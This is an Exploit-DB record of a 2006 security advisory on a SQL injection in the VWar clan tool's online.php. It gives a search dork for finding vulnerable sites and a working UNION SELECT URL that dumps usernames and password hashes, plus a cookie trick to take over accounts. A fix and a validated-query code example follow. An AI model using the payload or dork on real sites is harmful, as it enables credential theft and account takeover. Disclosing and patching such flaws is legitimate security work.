ID EDB-ID:2170
Type exploitdb
Reporter brOmstar
Modified 2006-08-10T00:00:00
Description
VWar <= 1.50 R14 (online.php) Remote SQL Injection Vulnerability. CVE-2006-4142,CVE-2007-2312. Webapps exploit for php platform
.:[ insecurity research team ]:.
.__..____.:.______.____.:.____ .
.:. | |/ \:/ ___// __ \:/ _\.:.
: | | | \\____\\ ___/\ /__ :. .
..: |__|___| /____ >\___ >\___ >.:
.:.. .. .\/ .:\/:. .\/. .:\/:
. ...:. .advisory. .:...
:..................: 1o.o8.2oo6 ..
Affected Application: VWar <= v1.50 R14
. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
Discovered by: brOmstar
Team: Insecurity Research Team
URL: http://www.insecurityresearch.org
E-Mail: brom0815@gmx.de
. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
Type: Remote [x] Local [ ]
Remote File Inclusion [ ] SQL Injection [x]
Level: Low [ ] Middle [ ] High [x]
Application: VWar
Version: <= v1.50 R14
Vulnerable File: extra/online.php
Vulnerable Variable: n
URL: http://www.vwar.de
Description: Virtual War is a tool for gaming clans.
Dork: intext:"Powered by: Virtual War v1.5.0"
. . :[ code snippet ]: . . . . . . . . . . . . . . . . . . . . . . . . .
line 63: $query = $vwardb->query("
line 64:     SELECT memberid, name, lastactivity
line 65:     FROM vwar".$n."_member WHERE lastactivity > ".(time() - $onlinetime * 60)."
line 66: ");
. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
example: if you want a list of userid/username/passwords, try this:
http://www.vwar.de/demo/extra/online.php?n=_member%20WHERE%20memberid=-999%20UNION%20SELECT%200,CONCAT(memberid,0x3A,name,0x3A,password),2%20FROM%20vwar_member%20%20/*
encrypt the md5-password again with md5 and throw it in a cookie... :-)
. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
o1.) open extra/online.php
o2.) take a look at the following lines:
41: if( !defined ("VWAR_COMMON_INCLUDED") )
42: {
43: $vwar_root = $vwar_xroot;
44: require_once ( $vwar_root . "includes/functions_common.php" );
45: }
o3.) add between line 44 and 45 this:
require_once ( $vwar_root . "includes/_config.inc.php" );
o4.) done!
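As an added example (not code from VWar or from the advisory author), here is the same query built so that the table prefix cannot carry SQL even if `$n` still arrives from the request through register_globals; the `vwar_table_suffix()` and `vwar_online_query()` helpers are assumptions, while `$vwardb->query()`, `$n` and `$onlinetime` are taken as the advisory shows them.

```php
<?php
// Added example, not VWar's own code. Root cause from the advisory:
// extra/online.php uses $n before anything initialised it, so with
// register_globals enabled the request parameter ?n=... becomes part
// of the table name in "vwar".$n."_member". Loading includes/_config.inc.php
// first (the advisory's fix) makes $n the administrator's value; the helper
// below additionally rejects anything that is not a plain identifier.

function vwar_table_suffix($n)
{
    // Allow only letters, digits and underscores, at most 16 characters.
    // \A and \z anchor the whole string (PHP's $ would tolerate a trailing
    // newline), so quotes, spaces, "/*" and SQL keywords are all refused.
    if (!is_string($n) || !preg_match('/\A[A-Za-z0-9_]{0,16}\z/', $n)) {
        throw new InvalidArgumentException('invalid table prefix');
    }
    return $n;
}

function vwar_online_query($n, $onlinetime)
{
    $suffix = vwar_table_suffix($n);
    // Force the cut-off to an integer so this operand cannot carry SQL either.
    $cutoff = time() - ((int) $onlinetime) * 60;
    return "SELECT memberid, name, lastactivity"
         . " FROM vwar" . $suffix . "_member"
         . " WHERE lastactivity > " . $cutoff;
}

// Intended use inside extra/online.php, after the config include that the
// advisory's fix adds (so $n and $onlinetime hold configured values):
//
//   require_once ( $vwar_root . "includes/_config.inc.php" );
//   $query = $vwardb->query(vwar_online_query($n, $onlinetime));
//
// With the advisory's payload ("_member WHERE memberid=-999 UNION ...") the
// helper throws instead of building a query, because of the spaces alone.
```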
. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
buzzdee, camino and my lovely, sexy girlfriend!
# milw0rm.com [2006-08-10]